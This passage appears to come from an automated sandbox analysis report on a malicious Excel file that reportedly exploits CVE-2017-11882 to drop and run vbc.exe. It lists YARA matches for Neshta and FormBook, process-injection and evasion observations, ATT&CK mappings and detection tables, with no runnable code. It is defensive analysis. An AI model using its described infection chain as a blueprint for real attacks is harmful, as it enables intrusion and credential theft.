    Source: 6.0.vbc.exe.1c0000.21.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.23.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.17.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.11.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.25.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.19.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.15.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.19.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 5.2.vbc.exe.30b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 5.2.vbc.exe.30b0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 6.0.vbc.exe.1c0000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000000.479470505.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.480530429.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000005.00000002.488911564.00000000030B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.484429588.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.486527655.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.478490697.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.474755506.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004047D3
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004061D4
    Source: C:\Users\Public\vbc.exeCode function: 5_2_73233070
    Source: C:\Users\Public\vbc.exeCode function: 5_2_732330BA
    Source: C:\Users\Public\vbc.exeCode function: 5_2_73235AEE
    Source: C:\Users\Public\vbc.exeCode function: 5_2_73235AFD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004047D3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004061D4
    Source: C:\Users\Public\vbc.exeCode function: String function: 00402A29 appears 51 times
    Source: C:\Users\Public\vbc.exeCode function: 5_2_73235ECC CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: Packing List.xlsxVirustotal: Detection: 32%
    Source: Packing List.xlsxReversingLabs: Detection: 29%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Packing List.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREDD7.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/20@0/1
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
    Source: Packing List.xlsxJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: wntdll.pdb source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsn3BBA.tmp\oxtrp.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2696Thread sleep time: -420000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405E93 FindFirstFileA,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402671 FindFirstFileA,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00402671 FindFirstFileA,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405E93 FindFirstFileA,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: vbc.exe, 00000005.00000002.488053406.00000000004E4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_73233070 lqcuopia,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,
    Source: C:\Users\Public\vbc.exeCode function: 5_2_732354DA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_7323581C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_7323579F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_732356EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_732357DE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeProcess queried: DebugPort

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Injects a PE file into a foreign processesShow sources
    Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

    Stealing of Sensitive Information:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

    Remote Access Functionality:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection112Masquerading111OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Packing List.xlsx32%VirustotalBrowse
    Packing List.xlsx30%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    6.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1130366Download File
    5.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.18.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.8.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.16.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.1c0000.13.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.1c0000.15.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.1c0000.7.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.1c0000.9.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.1c0000.21.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.400000.24.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.20.unpack100%AviraHEUR/AGEN.1130366Download File
    6.2.vbc.exe.1c0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
    5.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.1c0000.5.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.1c0000.23.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.1c0000.17.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.1c0000.11.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.1c0000.25.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.10.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.6.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.1c0000.19.unpack100%AviraW32/Delf.IDownload File
    6.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
